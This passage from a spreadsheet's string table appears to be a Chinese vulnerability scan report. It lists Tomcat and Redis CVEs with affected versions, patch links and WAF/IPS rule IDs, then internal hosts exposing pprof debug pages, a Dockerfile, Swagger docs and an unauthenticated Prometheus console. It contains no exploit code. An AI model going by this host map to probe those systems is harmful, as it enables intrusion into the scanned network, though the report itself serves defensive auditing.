    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://lists.apache.org/thread.html/rd48c72bd3255bda87564d4da3791517c074d94f8a701f93b85752651%40%3Cannounce.tomcat.apache.org%3E</t>
  </si>
  <si>
    <t>https://nvd.nist.gov/vuln/detail/CVE-2016-3427
https://www.vmware.com/security/advisories/VMSA-2016-0005.html
https://lists.apache.org/thread.html/rd48c72bd3255bda87564d4da3791517c074d94f8a701f93b85752651%40%3Cannounce.tomcat.apache.org%3E</t>
  </si>
  <si>
    <t>影响Tomcat:6.0.0版本(含)到6.0.44版本(含),7.0.0版本(含)到7.0.67版本(含),8.0.0版本(含)到8.0.30版本(含),9.0.0版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://tomcat.apache.org/security-7.html、http://tomcat.apache.org/security-8.html、http://tomcat.apache.org/security-9.html</t>
  </si>
  <si>
    <t>http://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.0.M3
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-8.html
http://tomcat.apache.org/security-9.html</t>
  </si>
  <si>
    <t>影响Tomcat:6.0.0版本(含)到6.0.47版本(含),7.0.0版本(含)到7.0.72版本(含),8.0.0版本(含)到8.0.38版本(含),8.5.0版本(含)到8.5.6版本(含),9.0.0版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.5.8, https://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.0.M13, https://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.73, https://tomcat.apache.org/security-6.html#Fixed_in_Apache_Tomcat_6.0.48, https://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.0.39</t>
  </si>
  <si>
    <t>https://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.5.8
https://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.0.39
https://tomcat.apache.org/security-6.html#Fixed_in_Apache_Tomcat_6.0.48
http://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.0.M13
https://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.73</t>
  </si>
  <si>
    <t>http://cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201001-274
https://lists.apache.org/thread.html/06cfb634bc7bf37af7d8f760f118018746ad8efbd519c4b789ac9c2e@%3Cdev.tomcat.apache.org%3E</t>
  </si>
  <si>
    <t>Apache Tomcat Mapper组件路径遍历漏洞</t>
  </si>
  <si>
    <t>影响Tomcat:6.0.0版本(含)到6.0.44版本(含),7.0.0版本(含)到7.0.67版本(含),8.0.0版本(含)到8.0.29版本(含),9.0.0.版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://tomcat.apache.org/security-6.htmlhttp://tomcat.apache.org/security-7.htmlhttp://tomcat.apache.org/security-8.htmlhttp://tomcat.apache.org/security-9.html</t>
  </si>
  <si>
    <t>http://cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201602-397
http://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.0.30
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201602-397</t>
  </si>
  <si>
    <t>http://cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201602-447
https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
https://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html#AppendixMSQL
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201512-025
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201602-442
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201607-650
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201602-402
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201602-447
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201602-400</t>
  </si>
  <si>
    <t>Apache Tomcat 安全特征问题漏洞</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://lists.apache.org/thread.html/5a2105a56b2495ab70fa568f06925bd861f0d71ffab4fb38bb4fdc45@%3Cannounce.tomcat.apache.org%3E</t>
  </si>
  <si>
    <t>https://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.72
http://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.0.M10
https://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.5.5_and_8.0.37
https://lists.apache.org/thread.html/5a2105a56b2495ab70fa568f06925bd861f0d71ffab4fb38bb4fdc45@%3Cannounce.tomcat.apache.org%3E</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：http://tomcat.apache.org/security-9.html, http://tomcat.apache.org/security-8.html, http://tomcat.apache.org/security-7.html, http://tomcat.apache.org/security-6.html</t>
  </si>
  <si>
    <t>https://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.72
http://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.0.M10
https://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.5.5_and_8.0.37
http://tomcat.apache.org/security-9.html
http://tomcat.apache.org/security-8.html
http://tomcat.apache.org/security-7.html
http://tomcat.apache.org/security-6.html</t>
  </si>
  <si>
    <t>http://cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-831
https://tomcat.apache.org/security-7.html#Fixed_in_Apache_Tomcat_7.0.72
http://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.0.M10
https://tomcat.apache.org/security-8.html#Fixed_in_Apache_Tomcat_8.5.5_and_8.0.37
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-831
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-829
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-828
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-827
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201610-830</t>
  </si>
  <si>
    <t>Redis Labs Redis hyperloglog 缓冲区错误漏洞(CVE-2019-10192)</t>
  </si>
  <si>
    <t>ips-11000281, ips-11000282, waf-11000281（有效）</t>
  </si>
  <si>
    <t>redis: 3.0.500</t>
  </si>
  <si>
    <t>影响redis:3.0版本(含)到3.2.13版本,4.0版本(含)到4.0.14版本,5.0版本(含)到5.0.4版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
https://github.com/antirez/redis/issues/6215</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201907-562
https://raw.githubusercontent.com/antirez/redis/3.2/00-RELEASENOTES</t>
  </si>
  <si>
    <t>Redis redis-cli 缓冲区错误漏洞</t>
  </si>
  <si>
    <t>影响redis:4.0.10以下版本,4.9.101版本(含)到4.9.103版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： 
https://github.com/antirez/redis/commit/9fdcc15962f9ff4baebe6fdd947816f43f730d50</t>
  </si>
  <si>
    <t>https://packetstormsecurity.com/files/153768/Red-Hat-Security-Advisory-2019-1860-01.html
https://www.exploit-db.com/exploits/44904</t>
  </si>
  <si>
    <t>Redis Lua子系统缓冲区错误漏洞</t>
  </si>
  <si>
    <t>ips-11000286, waf-11000286（有效）</t>
  </si>
  <si>
    <t>Redis 如下版本将受影响：3.2.12版本以下版本，4.0版本(含)到4.0.10版本，5.0 RC1版本(含)到5.0 RC2版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： 
https://github.com/antirez/redis/issues/5017</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201806-928
https://github.com/antirez/redis/issues/5017</t>
  </si>
  <si>
    <t>Redis 缓冲区错误漏洞（CVE-2017-15047）</t>
  </si>
  <si>
    <t>ips-11000289, waf-11000289（有效）</t>
  </si>
  <si>
    <t>影响redis: 5.0.9之前版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： 
https://github.com/antirez/redis/issues/4278</t>
  </si>
  <si>
    <t>https://github.com/antirez/redis/issues/4278</t>
  </si>
  <si>
    <t>Redis lua子系统缓冲区错误漏洞(CVE-2018-11218)</t>
  </si>
  <si>
    <t>ips-11000286（有效）</t>
  </si>
  <si>
    <t>3.0.0 ≤Redis≤3.2.124.0.0≤Redis≤4.0.105.0 ≤Redis≤5.0:rc1</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： https://github.com/antirez/redis/issues/5017</t>
  </si>
  <si>
    <t>https://github.com/antirez/redis/issues/5017
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_29569&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>Redis 整数溢出漏洞(CVE-2018-11219)</t>
  </si>
  <si>
    <t>ips-11000287（有效）</t>
  </si>
  <si>
    <t>Redis≤3.2.124.0≤Redis&lt;4.0.105.0≤Redis&lt;5.0 RC2</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://github.com/antirez/redis/issues/5017</t>
  </si>
  <si>
    <t>https://github.com/antirez/redis/issues/5017
https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2020_29570&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>Redis Labs Redis 代码注入漏洞(CVE-2022-24735)</t>
  </si>
  <si>
    <t>影响redis:6.2.7以下版本,7.0.rc1版本,7.0.rc2版本,7.0.rc3版本</t>
  </si>
  <si>
    <t>厂商补丁: 目前厂商已发布升级补丁以修复漏洞，补丁获取链接：  https://github.com/redis/redis/security/advisories/GHSA-647m-2wmq-qmvq</t>
  </si>
  <si>
    <t>Redis Labs Redis 安全漏洞(CVE-2021-31294)</t>
  </si>
  <si>
    <t>影响Redis:6.2.0以下版本</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://github.com/redis/redis/commit/46f4ebbe842620f0976a36741a72482620aa4b48</t>
  </si>
  <si>
    <t>Redis Labs Redis拒绝服务漏洞(CVE-2020-14147)</t>
  </si>
  <si>
    <t>ips-11000280（有效）</t>
  </si>
  <si>
    <t>影响redis:6.0.3以下版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
https://github.com/antirez/redis/commit/ef764dde1cca2f25d00686673d1bc89448819571</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-202006-1037
https://www.anquanke.com/vul/id/2059570</t>
  </si>
  <si>
    <t>Redis 安全漏洞(CVE-2018-12453)</t>
  </si>
  <si>
    <t>影响redis:5.0以下版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： 
https://github.com/antirez/redis/commit/c04082cf138f1f51cedf05ee9ad36fb6763cafc6</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201806-945
https://www.exploit-db.com/exploits/44908</t>
  </si>
  <si>
    <t>Redis 整数溢出漏洞（CVE-2018-11219）</t>
  </si>
  <si>
    <t>ips-11000287, waf-11000287（有效）</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201806-927
https://github.com/antirez/redis/issues/5017</t>
  </si>
  <si>
    <t>Redis 跨站脚本漏洞(CVE-2016-10517)</t>
  </si>
  <si>
    <t>ips-11000288, waf-11000288（有效）</t>
  </si>
  <si>
    <t>影响redis:3.2.7以下版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接： 
https://www.reddit.com/r/redis/comments/5r8wxn/redis_327_is_out_important_security_fixes_inside/</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201710-1131
https://github.com/antirez/redis/commit/874804da0c014a7d704b3d285aa500098a931f50</t>
  </si>
  <si>
    <t>Redis linenoise 信息泄露漏洞（CVE-2013-7458）</t>
  </si>
  <si>
    <t>影响redis:3.2.3以下版本</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接： 
https://github.com/antirez/redis/blob/3.2/00-RELEASENOTES</t>
  </si>
  <si>
    <t>https://www.auscert.org.au/bulletins/ESB-2020.4050/
http://www.openwall.com/lists/oss-security/2016/07/28/10</t>
  </si>
  <si>
    <t>Redis 输入验证错误漏洞(CVE-2021-32761)</t>
  </si>
  <si>
    <t>ips-11000357, ips-11000358（有效）</t>
  </si>
  <si>
    <t>影响Redis:2.2.0版本(含)到5.0.13版本,6.0版本(含)到6.0.15版本,6.2.0版本(含)到6.2.5版本</t>
  </si>
  <si>
    <t>厂商补丁:https://github.com/redis/redis/security/advisories/GHSA-8wxq-j7rp-g8wj</t>
  </si>
  <si>
    <t>https://github.com/redis/redis/security/advisories/GHSA-8wxq-j7rp-g8wj</t>
  </si>
  <si>
    <t>Redis Labs Redis 代码问题漏洞(CVE-2022-24736)</t>
  </si>
  <si>
    <t>厂商补丁: 目前厂商已发布升级补丁以修复漏洞，补丁获取链接：  https://github.com/redis/redis/security/advisories/GHSA-3qpw-7686-5984</t>
  </si>
  <si>
    <t>Redis hyperloglog data structure 缓冲区错误漏洞(CVE-2019-10193)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，详情请关注厂商主页：
http://redis.io/</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201907-660
https://github.com/antirez/redis/issues/6215</t>
  </si>
  <si>
    <t>Redis堆缓冲区溢出漏洞（CVE-2021-3470）</t>
  </si>
  <si>
    <t>影响redis:5.0.10以下版本,6.0.0版本(含)到6.0.9版本,6.2.0版本(含)到6.2.1版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://bugzilla.redhat.com/show_bug.cgi?id=1943623</t>
  </si>
  <si>
    <t>Redis Labs Redis 缓冲区错误漏洞（CVE-2021-32626）</t>
  </si>
  <si>
    <t>2.6 &lt;= redis &lt; 5.0.146.0.0 &lt;= redis &lt; 6.0.166.2.0 &lt;= redis &lt; 6.2.6</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://github.com/redis/redis/security/advisories/GHSA-p486-xggp-782c</t>
  </si>
  <si>
    <t>https://nvd.nist.gov/vuln/detail/CVE-2021-32626</t>
  </si>
  <si>
    <t>Apache Tomcat DIGEST身份验证多个安全漏洞(CVE-2012-3439)</t>
  </si>
  <si>
    <t>影响Tomcat:5.5.0版本(含)到5.5.35版本(含),6.0.0版本(含)到6.0.35版本(含),7.0.0版本(含)到7.0.27版本(含)</t>
  </si>
  <si>
    <t>厂商补丁：Apache Group,请更新到5.5.36、6.0.36、7.0.30,Announcement2.2：Apache HTTP Server 2.2.23 Released,链接：http://www.apache.org/dist/httpd/Announcement2.2.html</t>
  </si>
  <si>
    <t>Apache Tomcat 代码问题漏洞(CVE-2014-0227)</t>
  </si>
  <si>
    <t>6.0≤Apache Tomcat&lt;6.0.427.0≤Apache Tomcat&lt;7.0.558.0≤Apache Tomcat&lt;8.0.9</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://Tomcat.apache.org/security-6.html</t>
  </si>
  <si>
    <t>https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2019_09934&amp;lang=ZH-CN</t>
  </si>
  <si>
    <t>http://192.168.1.103:80/</t>
  </si>
  <si>
    <t>https://192.168.1.8:443</t>
  </si>
  <si>
    <t>https://192.168.1.113:4433</t>
  </si>
  <si>
    <t>4433</t>
  </si>
  <si>
    <t>http://192.168.1.113:80</t>
  </si>
  <si>
    <t>http://192.168.1.8:80</t>
  </si>
  <si>
    <t>https://192.168.1.113:443</t>
  </si>
  <si>
    <t>https://192.168.1.8:443/</t>
  </si>
  <si>
    <t>http://192.168.1.9:4388</t>
  </si>
  <si>
    <t>http://192.168.1.11:80/</t>
  </si>
  <si>
    <t>http://192.168.1.81:80</t>
  </si>
  <si>
    <t>https://192.168.1.119:4433</t>
  </si>
  <si>
    <t>http://192.168.1.119:80</t>
  </si>
  <si>
    <t>https://192.168.1.119:443</t>
  </si>
  <si>
    <t>http://192.168.1.119:80/</t>
  </si>
  <si>
    <t>https://192.168.1.119:4433/</t>
  </si>
  <si>
    <t>https://192.168.1.112:4433</t>
  </si>
  <si>
    <t>http://192.168.1.113:80/</t>
  </si>
  <si>
    <t>https://192.168.1.113:4433/</t>
  </si>
  <si>
    <t>http://192.168.1.112:80</t>
  </si>
  <si>
    <t>https://192.168.1.112:443</t>
  </si>
  <si>
    <t>http://192.168.1.100:2021</t>
  </si>
  <si>
    <t>http://192.168.1.100:80</t>
  </si>
  <si>
    <t>http://192.168.1.112:80/</t>
  </si>
  <si>
    <t>https://192.168.1.112:4433/</t>
  </si>
  <si>
    <t>http://192.168.1.100:2022</t>
  </si>
  <si>
    <t>2022</t>
  </si>
  <si>
    <t>http://192.168.1.100:10082</t>
  </si>
  <si>
    <t>http://192.168.1.100:80/</t>
  </si>
  <si>
    <t>http://192.168.1.102:80</t>
  </si>
  <si>
    <t>http://192.168.1.102:81</t>
  </si>
  <si>
    <t>http://192.168.1.102:10082</t>
  </si>
  <si>
    <t>http://192.168.1.102:8080/</t>
  </si>
  <si>
    <t>http://192.168.1.102:80/</t>
  </si>
  <si>
    <t>http://192.168.1.101:80</t>
  </si>
  <si>
    <t>http://192.168.1.101:8080</t>
  </si>
  <si>
    <t>http://192.168.1.101:81</t>
  </si>
  <si>
    <t>http://192.168.1.101:10082</t>
  </si>
  <si>
    <t>http://192.168.1.101:80/</t>
  </si>
  <si>
    <t>Apache Tomcat Host Manager Servlet跨站脚本执行漏洞(CVE-2007-3386)</t>
  </si>
  <si>
    <t>waf-13030230（有效）</t>
  </si>
  <si>
    <t>Tomcat: 5.5.9</t>
  </si>
  <si>
    <t>影响Tomcat:5.5.0版本(含)到5.5.24版本(含),6.0.0版本(含)到6.0.13版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：http://apache.mirror.rafal.ca/tomcat/tomcat-6/v6.0.14/bin/apache-tomcat-6.0.14.tar.gz</t>
  </si>
  <si>
    <t>Apache Tomcat Manager和Host Manage跨站脚本执行漏洞(CVE-2007-2450)</t>
  </si>
  <si>
    <t>影响Tomcat:4.0.0版本(含)到4.0.6版本(含),4.1.0版本(含)到4.1.36版本(含),5.0.0版本(含)到5.0.30版本(含),5.5.0版本(含)到5.5.24版本(含),6.0.0版本(含)到6.0.13版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链：http://jakarta.apache.org/tomcat/index.html</t>
  </si>
  <si>
    <t>Apache Tomcat Cookie 敏感信息泄露漏洞(CVE-2007-3385)</t>
  </si>
  <si>
    <t>waf-13070402（有效）</t>
  </si>
  <si>
    <t>影响Tomcat:3.3版本(含)到3.3.2版本(含),4.1.0版本(含)到4.1.36版本(含),5.0.0版本(含)到5.0.30版本(含),5.5.0版本(含)到5.5.24版本(含),6.0.0版本(含)到6.0.13版本(含)</t>
  </si>
  <si>
    <t>http://www.kb.cert.org/vuls/id/545804
www.oracle.com
http://www.oracle.com/technetwork/topics/security/cpujan2006-082403.html</t>
  </si>
  <si>
    <t>Apache Tomcat Cookie敏感信息泄露漏洞(CVE-2007-3382)</t>
  </si>
  <si>
    <t>http://www.kb.cert.org/vuls/id/545804
www.oracle.com
http://www.oracle.com/technetwork/topics/security/cpujan2006-082403.html
http://xforce.iss.net/xforce/xfdb/24321</t>
  </si>
  <si>
    <t>Apache Tomcat 远程目录 'index.jsp'信息泄露漏洞(CVE-2006-3835)</t>
  </si>
  <si>
    <t>waf-13070355（有效）</t>
  </si>
  <si>
    <t>影响Tomcat:4.0.0版本(含)到4.0.6版本(含),4.1.0-4.1.31]版本(含)5.0.0版本(含)到5.0.30版本(含),5.5.0版本(含)到5.5.12版本(含)</t>
  </si>
  <si>
    <t>参见《Apache Tomcat 远程目录 _index.jsp_信息泄露漏洞(CVE-2006-3835)-修复方案》</t>
  </si>
  <si>
    <t>http://secunia.com/advisories/15991/
http://xforce.iss.net/xforce/xfdb/22541</t>
  </si>
  <si>
    <t>Apache Tomcat 目录列表拒绝服务漏洞(CVE-2005-3510)</t>
  </si>
  <si>
    <t>影响Tomcat:4.0.0版本(含)到4.0.6版本(含),4.1.0版本(含)到4.1.31版本(含),5.0.0版本(含)到5.0.30版本(含),5.5.0版本(含)到5.5.12版本(含)</t>
  </si>
  <si>
    <t>Apache Tomcat 目录遍历漏洞(CVE-2007-1860)</t>
  </si>
  <si>
    <t>影响Tomcat:4.0.0版本(含)到4.0.6版本(含),4.1.0版本,到4.1.34版本(含),5.0.0版本(含)到5.0.30版本(含),5.5.0版本(含)到5.5.21版本(含)</t>
  </si>
  <si>
    <t>请及时更新Tomcat到不受影响版本。</t>
  </si>
  <si>
    <t>Apache Tomcat 跨站请求伪造漏洞(CVE-2013-6357)</t>
  </si>
  <si>
    <t>影响Tomcat:1.1.3版本,3.0版本(含)到3.3.2版本(含),4.0版本(含)到4.1.36版本(含),5.0.0版本(含)到5.0.30版本(含),5.5.0版本(含)到5.5.25版本(含)</t>
  </si>
  <si>
    <t>目前apache已经发布tomcat最新版本,请到厂商的官方页面下载最新版本：http://tomcat.apache.org/</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201311-173
http://www.webapp-security.com/wp-content/uploads/2013/11/Apache-Tomcat-5.5.25-CSRF-Vulnerabilities.txt</t>
  </si>
  <si>
    <t>Apache Tomcat JSP示例Web应用跨站脚本执行漏洞</t>
  </si>
  <si>
    <t>waf-13030151, waf-13070342（有效）</t>
  </si>
  <si>
    <t>影响Tomcat:4.0.0版本(含)到4.0.6版本(含),4.1.0版本(含)到4.1.36版本(含),5.0版本(含)到5.0.30版本(含),5.5版本(含)到5.5.24版本(含),6.0版本(含)到6.0.13版本(含)</t>
  </si>
  <si>
    <t>Apple Tomcat 信息泄露漏洞(CVE-2007-1358)</t>
  </si>
  <si>
    <t>影响Tomcat:4.0.0版本(含)到4.0.6版本(含),4.1.0版本(含)到4.1.34版本(含),5.0.0版本(含)到5.0.30版本(含),5.5.0版本(含)到5.5.20版本(含),6.0.0版本(含)到6.0.5版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：http://docs.info.apple.com/article.html?artnum=306172</t>
  </si>
  <si>
    <t>Apache HTTP Server Tomcat远程目录访问漏洞</t>
  </si>
  <si>
    <t>waf-13070394（有效）</t>
  </si>
  <si>
    <t>影响Tomcat:4.0.0版本(含)到4.0.6版本(含),4.1.0版本(含)到4.1.34版本(含),5.0.0版本(含)到5.0.30版本(含),5.5.0版本(含)到5.5.21版本(含),6.0.0版本(含)到6.0.9版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：http://gulus.usherbrooke.ca/pub/appl/apache/tomcat/tomcat-5/v5.5.23/bin/apache-tomcat-5.5.23.tar.gzhttp://apache.mirror.rafal.ca/tomcat/tomcat-6/v6.0.10/bin/apache-tomcat-6.0.10.tar.gz</t>
  </si>
  <si>
    <t>http://cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200703-400
https://lists.apache.org/thread.html/277d42b48b6e9aef50949c0dcc79ce21693091d73da246b3c1981925@%3Cdev.tomcat.apache.org%3E</t>
  </si>
  <si>
    <t>Apache Tomcat mod_jk Content-Length头信息泄露漏洞</t>
  </si>
  <si>
    <t>影响Tomcat:4.0.0版本(含)到4.0.6版本(含),4.1.0版本(含)到4.1.36版本(含),5.0.0版本(含)到5.0.30版本(含),5.5.0版本(含)到5.5.27版本(含)</t>
  </si>
  <si>
    <t>厂商补丁:目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://tomcat.apache.org/security.html</t>
  </si>
  <si>
    <t>Apache Tomcat SSL Anonymous Cipher 配置信息泄露漏洞</t>
  </si>
  <si>
    <t>影响Tomcat:4.1.28版本(含)到4.1.31版本(含),5.0.0版本(含)到5.0.30版本(含),5.5.0版本(含)到5.5.16版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：http://archive.apache.org/dist/tomcat/tomcat-4/v4.1.32/bin/apache-tomcat-4.1.32.ziphttp://archive.apache.org/dist/tomcat/tomcat-5/v5.5.20/bin/apache-tomcat-5.5.20.ziphttp://archive.apache.org/dist/tomcat/tomcat-5/v5.0.30/bin/jakarta-tomcat-5.0.30.zip</t>
  </si>
  <si>
    <t>Apache Tomcat Cal2.JSP 跨站脚本攻击漏洞(CVE-2006-7196)</t>
  </si>
  <si>
    <t>ips-11023974, waf-13030230（有效）</t>
  </si>
  <si>
    <t>影响Tomcat:4.0.0版本(含)到4.0.6版本(含),4.1.0版本(含)到4.1.31版本(含),5.0.0版本(含)到5.0.30版本(含),5.5.0版本(含)到5.5.15版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：http://archive.apache.org/dist/tomcat/tomcat-4/v4.1.32/</t>
  </si>
  <si>
    <t>Apache Tomcat SingleSignOn 远程信息泄露漏洞</t>
  </si>
  <si>
    <t>影响Tomcat:6.0.0版本(含)到6.0.8版本(含),5.0.0版本(含)到5.0.SVN版本(含),5.5.0版本(含)到5.5.20版本(含),4.1.0版本(含)到4.1.37版本(含)</t>
  </si>
  <si>
    <t>Apache Tomcat 'implicit-objects.jsp' 跨站脚本攻击漏洞</t>
  </si>
  <si>
    <t>影响Tomcat:5.0.0版本(含)到5.0.30版本(含),5.5.0版本(含)到5.5.17版本(含)</t>
  </si>
  <si>
    <t>目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本</t>
  </si>
  <si>
    <t>http://cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200705-187
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-200705-187</t>
  </si>
  <si>
    <t>Apache Tomcat Documentation Sample 应用程序多个跨站脚本攻击漏洞</t>
  </si>
  <si>
    <t>影响Tomcat:4.0.1版本(含)到4.0.6版本(含),4.1.0版本(含)到4.1.36版本(含),5.0.0版本(含)到5.0.30版本(含),5.5.0版本(含)到5.5.23版本(含),6.0.0版本(含)到6.0.10版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复这个安全问题，补丁下载链接：http://gulus.usherbrooke.ca/pub/appl/apache/tomcat/tomcat-6/v6.0.13/bin/apache-tomcat-6.0.13.tar.gz</t>
  </si>
  <si>
    <t>mysql: 5.7.41</t>
  </si>
  <si>
    <t>http://172.16.6.55:6060/debug/pprof/</t>
  </si>
  <si>
    <t>http://172.16.5.73:8099</t>
  </si>
  <si>
    <t>http://172.16.5.73:8099/</t>
  </si>
  <si>
    <t>http://172.16.5.73:8099/swagger</t>
  </si>
  <si>
    <t>Dockerfile 信息泄露漏洞</t>
  </si>
  <si>
    <t>http://172.16.5.84:9503/dockerfile</t>
  </si>
  <si>
    <t>删除此文件</t>
  </si>
  <si>
    <t>http://172.16.5.84:6060/debug/pprof/</t>
  </si>
  <si>
    <t>http://172.16.5.85:6060/debug/pprof/</t>
  </si>
  <si>
    <t>http://172.16.5.85:9503/dockerfile</t>
  </si>
  <si>
    <t>http://172.16.5.62:8081</t>
  </si>
  <si>
    <t>http://172.16.5.62:80</t>
  </si>
  <si>
    <t>http://172.16.5.62:443</t>
  </si>
  <si>
    <t>http://172.16.5.82:9090</t>
  </si>
  <si>
    <t>http://172.16.5.82:80</t>
  </si>
  <si>
    <t>Prometheus监控告警平台未授权访问</t>
  </si>
  <si>
    <t>http://172.16.5.82:9090/graph</t>
  </si>
  <si>
    <t>攻击者可直接进入该系统，获取服务器敏感信息，查看系统运行日志，并利用泄露的信息进行进一步攻击。</t>
  </si>
  <si>
    <t>1、添加身份验证，密码最好包含大小写字母、数字和特殊字符等，且位数大于8位。2、如非必要，禁止公网访问该系统。3、通过防火墙等安全设备设置访问策略，设置白名单访问。</t>
  </si>
  <si>
    <t>http://172.16.5.82:9090/</t>
  </si>
  <si>
    <t>http://172.16.5.13:9090</t>
  </si>
  <si>
    <t>http://172.16.5.90:80</t>
  </si>
  <si>
    <t>http://172.16.5.90:81</t>
  </si>
  <si>
    <t>http://172.16.5.90:8080</t>
  </si>
  <si>
    <t>http://172.16.5.82:9090/debug/pprof/</t>
  </si>
  <si>
    <t>http://172.16.5.82:9090/metrics</t>
  </si>
  <si>
    <t>http://172.16.5.82:8889/metrics</t>
  </si>
  <si>
    <t>8889</t>
  </si>
  <si>
    <t>http://172.16.6.20:80/</t>
  </si>
  <si>
    <t>https://172.16.6.20:1158</t>
  </si>
  <si>
    <t>http://172.16.5.90:80/</t>
  </si>
  <si>
    <t>http://172.16.5.90:8080/v2/api-docs</t>
  </si>
  <si>
    <t>http://172.16.5.90:8080/</t>
  </si>
  <si>
    <t>http://172.16.5.61:80</t>
  </si>
  <si>
    <t>http://172.16.5.90:81/</t>
  </si>
  <si>
